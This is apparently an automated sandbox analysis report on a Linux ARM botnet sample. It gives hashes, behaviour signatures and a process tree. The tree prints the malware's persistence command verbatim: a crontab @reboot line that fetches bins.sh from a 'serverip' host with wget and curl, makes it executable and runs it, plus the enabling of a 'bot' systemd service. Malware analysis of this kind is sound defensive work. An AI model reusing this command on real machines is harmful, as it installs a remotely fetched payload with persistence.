Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags
    arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  • submitted
    11/10/2024, 02:08

General

  • Target

    ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf

  • Size

    76KB

  • MD5

    0bbc673a23d323061c36a37fe5c3d509

  • SHA1

    38f0a56d732c509f9bfb51d5fe6002619f6a6c7a

  • SHA256

    ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a

  • SHA512

    1037513661209ed70d9932ef8479b1b59850d215c5c1105f93212f7961441739860b887c8ad94c085912dcaed2cd0e9ecb3c8a0b21baf8f7b975546dbc6722a8

  • SSDEEP

    1536:lxu6Nt3LUDmK+Y104tBrDu/XyYp41N/DAzdLvNs/:lk6N9LUxtB3UZp4n8tNs/

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Modifies systemd 2 TTPs 1 IoCs

    Adds/modifies systemd service files, likely to achieve persistence.

  • Modifies Bash startup script 2 TTPs 1 IoCs
  • Changes its process name 1 IoCs
  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 6 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 1 IoCs

    Adversaries may gather information about the network configuration of a system.

Processes

  • /tmp/ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf
    /tmp/ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf
    1⤵
    • Modifies Watchdog functionality
    • Creates/modifies environment variables
    • Enumerates active TCP sockets
    • Modifies systemd
    • Modifies Bash startup script
    • Changes its process name
    • Reads system network configuration
    PID:648
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:657
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        • Reads runtime system information
        PID:659
      • /usr/bin/crontab
        crontab -l
        3⤵
        • Reads runtime system information
        PID:660
      • /bin/chmod
        chmod +x bins.sh
        3⤵
        • File and Directory Permissions Modification
        PID:663
      • /bin/sh
        sh bins.sh
        3⤵
        PID:665
      • /bin/curl
        /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
        3⤵
        • System Network Configuration Discovery
        PID:667
      • /bin/chmod
        chmod +x bins.sh
        3⤵
        • File and Directory Permissions Modification
        PID:668
      • /bin/sh
        sh bins.sh
        3⤵
        PID:658
    • /bin/sh
      sh -c "/bin/systemctl enable bot"
      2⤵
      PID:673
      • /bin/systemctl
        /bin/systemctl enable bot
        3⤵
        • Enumerates kernel/hardware configuration
        • Reads runtime system information
        PID:674

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /lib/systemd/system/bot.service
    Filesize
    356B
    MD5
    f03c70cd4c61a1852f9e19b8fb0d639c
    SHA1
    a6c078ffffdf05c4c47b273b24e6b3ff4ef7e008
    SHA256
    ae50a3052a395987a2779deb9253d4aa8638f2f8b1cda7df9039388f21be7a90
    SHA512
    6277fbbffcdd72fc3712721525538ac07fc46d290ebb02be34cef52b3e62bfa8a66f4e834d364d220108c815192e391ad986f05662fcbfae674417507f4bcc20

  • /var/spool/cron/crontabs/tmp.ikoZ1g
    Filesize
    235B
    MD5
    f66259049e77e016213c05613e7bd249
    SHA1
    8cfa3c99058059df6e1b461d9a72562562da8436
    SHA256
    606f9c8cab193f4bf6275e55242ec7b1b33f0d3097ca110d232fffa7ba3edde9
    SHA512
    8a86630ac05b222c203abcc6eae50cabbde9ca31121301df15140b8e77cfb5e088249dc3810430c257cb410ea630c26faa72ef199760db076506cdd04d86018a